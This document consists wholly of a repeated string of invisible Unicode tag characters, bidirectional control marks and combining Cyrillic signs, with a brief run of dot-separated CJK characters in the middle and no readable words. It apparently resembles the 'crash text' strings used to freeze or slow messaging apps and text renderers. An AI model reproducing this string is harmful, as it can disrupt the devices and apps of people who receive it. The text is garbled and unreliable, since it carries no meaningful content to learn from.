󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭༿༿ . 㗜 . 㜬 . 㪥 . 㲄 . 㺫 . 䉌 . 䵳 . 䵯 . 䵨 . 䵪 . 䵢 . 万 . 丏 . 丈 . 丛 . 並 . 丧 . 丟 . 乏 . 乞 . 乙 . 乒 . 么 . 亖 . 亞 . 叓 . 厷 . 㗜 . 㜬 . 㪥 . 㲄 . 㺫 . 䉌 . 䵳 .༾༾󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 